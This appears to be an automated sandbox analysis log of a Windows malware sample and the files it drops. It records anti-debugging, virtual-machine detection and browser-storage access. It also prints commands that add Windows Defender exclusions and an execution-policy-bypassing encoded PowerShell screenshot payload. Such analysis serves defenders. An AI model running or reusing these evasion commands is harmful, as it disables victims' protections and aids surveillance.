Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7691A79B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691A85A0 FindFirstFileExW,FindClose,	0_2_00007FF7691A85A0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7691C0B84
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A85A0 FindFirstFileExW,FindClose,	1_2_00007FF7691A85A0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF7691A79B0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF7691C0B84
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0092C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0092C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0093E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0093E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692978B00 FindFirstFileExW,FindClose,	5_2_00007FF692978B00
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692991FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF692991FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	5_2_00007FF692987F4C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E2DCE0 FindFirstFileExW,	6_2_00000202B6E2DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00007FF7D15479B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D15485A0 FindFirstFileExW,FindClose,	6_2_00007FF7D15485A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF7D1560B84
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64DCE0 FindFirstFileExW,	8_2_00000273EE64DCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15485A0 FindFirstFileExW,FindClose,	8_2_00007FF7D15485A0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF7D15479B0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF7D1560B84

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: 4_2_00940B80 VirtualQuery,GetSystemInfo,

4_2_00940B80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: s.exe, 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RcF33KCGtqeMuNK3lOt
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: s.exe, 0000000B.00000002.1767529546.0000000007E90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: based.exe, 00000008.00000002.2383040815.00000273EDF61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monito&
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: s.exe, 0000000B.00000002.1767529546.0000000007E90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: Build.exe, 00000004.00000002.1729756868.00000000081A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: based.exe, 00000008.00000002.2383040815.00000273EDF61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monito&&
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: based.exe, 00000008.00000003.1868467332.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

API call chain: ExitProcess graph end node

graph_4-25035

Source: C:\ProgramData\setup.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7691B9924

Source: C:\ProgramData\Microsoft\based.exe

Code function: 8_2_00007FFDFB4358A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

8_2_00007FFDFB4358A0

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: 4_2_0094A640 mov eax, dword ptr fs:[00000030h]

4_2_0094A640

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691C2790 GetProcessHeap,

0_2_00007FF7691C2790

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Process token adjusted: Debug
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7691B9924
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691AC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7691AC44C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691ABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7691ABBC0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 0_2_00007FF7691AC62C SetUnhandledExceptionFilter,	0_2_00007FF7691AC62C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF7691B9924
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691AC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF7691AC44C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691ABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF7691ABBC0
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FF7691AC62C SetUnhandledExceptionFilter,	1_2_00007FF7691AC62C
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: 1_2_00007FFE1331004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FFE1331004C
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0094215D SetUnhandledExceptionFilter,	4_2_0094215D
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_009412D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_009412D7
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_0094647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0094647F
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: 4_2_00941FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00941FCA
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69298ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF69298ACD8
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69297C860 SetUnhandledExceptionFilter,	5_2_00007FF69297C860
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69297BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF69297BDE0
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 5_2_00007FF69297C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FF69297C67C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E27D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000202B6E27D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00000202B6E2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00000202B6E2D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D1559924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7D1559924
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D154C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF7D154C44C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D154BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF7D154BBC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 6_2_00007FF7D154C62C SetUnhandledExceptionFilter,	6_2_00007FF7D154C62C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000273EE64D2A4
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00000273EE647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000273EE647D90
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D1559924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7D1559924
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D154C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF7D154C44C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D154BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF7D154BBC0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF7D154C62C SetUnhandledExceptionFilter,	8_2_00007FF7D154C62C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB5730D8 IsProcessorFeaturePresent,00007FFE132319A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE132319A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FFDFB5730D8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FFDFB692004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FFDFB692004

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIA